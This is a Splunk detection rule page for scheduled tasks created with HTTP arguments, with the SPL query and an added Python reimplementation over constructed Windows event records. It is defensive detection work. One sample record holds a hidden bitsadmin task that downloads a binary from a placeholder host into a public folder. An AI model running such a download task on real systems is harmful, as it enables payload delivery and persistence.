SPL · Apache-2.0 · from splunk/security_content

Schedule Task with HTTP Command Arguments

The following analytic detects the creation of scheduled tasks on Windows systems that include HTTP command arguments, using Windows Security EventCode 4698. It identifies tasks registered via schtasks.exe or TaskService with HTTP in their command arguments. This behavior is significant as it often indicates malware activity or the use of Living off the Land binaries (lolbins) to download additional payloads. If confirmed malicious, this activity could lead to data exfiltration, malware propagation, or unauthorized access to sensitive information, necessitating immediate investigation and mitigation.

Rule source: detections/endpoint/schedule_task_with_http_command_arguments.yml
`wineventlog_security` EventCode=4698
  | xmlkv Message
  | search Arguments IN ("*http*")
  | stats count min(_time) as firstTime max(_time) as lastTime
    BY dest, Task_Name, Command,
       Author, Enabled, Hidden,
       Arguments
  | `security_content_ctime(firstTime)`
  | `security_content_ctime(lastTime)`
  | `schedule_task_with_http_command_arguments_filter`
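The same detection logic as the SPL above, reimplemented in Python over a few constructed EventCode 4698 records so the parsing and aggregation steps can be run offline. This is an added example, not part of splunk/security_content; the Task XML layout follows the Windows Task Scheduler schema, while the host names, task names, times and URL are invented sample values.

```python
import xml.etree.ElementTree as ET
from collections import defaultdict

# Constructed sample EventCode 4698 records, not real logs: Message carries the
# TaskContent XML that Windows logs when a task is registered.
TASK_XML = ('<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">'
            '<RegistrationInfo><Author>{author}</Author><URI>{name}</URI></RegistrationInfo>'
            '<Settings><Enabled>true</Enabled><Hidden>{hidden}</Hidden></Settings>'
            '<Actions><Exec><Command>{cmd}</Command><Arguments>{args}</Arguments></Exec>'
            '</Actions></Task>')
BENIGN = TASK_XML.format(author="CORP\\alice", name="\\Backup", hidden="false",
                         cmd="C:\\Windows\\System32\\robocopy.exe", args="C:\\data D:\\bak")
SUSPECT = TASK_XML.format(author="CORP\\svc", name="\\Updater", hidden="true",
                          cmd="C:\\Windows\\System32\\bitsadmin.exe",
                          args="/transfer j HTTP://example.invalid/a.bin C:\\Users\\Public\\a.bin")
SAMPLE_EVENTS = [  # _time values are constructed epoch seconds
    {"_time": 100, "dest": "ws01", "EventCode": 4698, "Message": BENIGN},
    {"_time": 200, "dest": "ws02", "EventCode": 4698, "Message": SUSPECT},
    {"_time": 300, "dest": "ws02", "EventCode": 4698, "Message": SUSPECT},  # same task, re-registered
    {"_time": 400, "dest": "ws03", "EventCode": 4702, "Message": SUSPECT},  # 4702 = task updated, out of scope
]

def parse_task_content(message):
    """Flatten the TaskContent XML into the fields the SPL stats clause groups by."""
    fields = {}
    for el in ET.fromstring(message).iter():
        name = el.tag.rsplit("}", 1)[-1]  # drop the XML namespace, as xmlkv does
        if name in ("Author", "URI", "Enabled", "Hidden", "Command", "Arguments"):
            fields["Task_Name" if name == "URI" else name] = el.text or ""
    return fields

def detect_http_task_registrations(events):
    """EventCode=4698 with 'http' anywhere in Arguments (case-insensitive, like SPL's
    search), aggregated as count/firstTime/lastTime per dest and task fields."""
    groups = defaultdict(lambda: {"count": 0, "firstTime": float("inf"), "lastTime": 0})
    for ev in events:
        if ev.get("EventCode") != 4698:
            continue
        f = parse_task_content(ev["Message"])
        if "http" not in f.get("Arguments", "").lower():
            continue
        key = (ev["dest"], f["Task_Name"], f["Command"], f["Author"],
               f["Enabled"], f["Hidden"], f["Arguments"])
        g = groups[key]
        g["count"] += 1
        g["firstTime"] = min(g["firstTime"], ev["_time"])
        g["lastTime"] = max(g["lastTime"], ev["_time"])
    return dict(groups)
```

Only the hidden bitsadmin task on ws02 is returned, with count 2 and its first/last registration times; the filter macro from the SPL is where you would exclude known-good tasks that legitimately carry URLs.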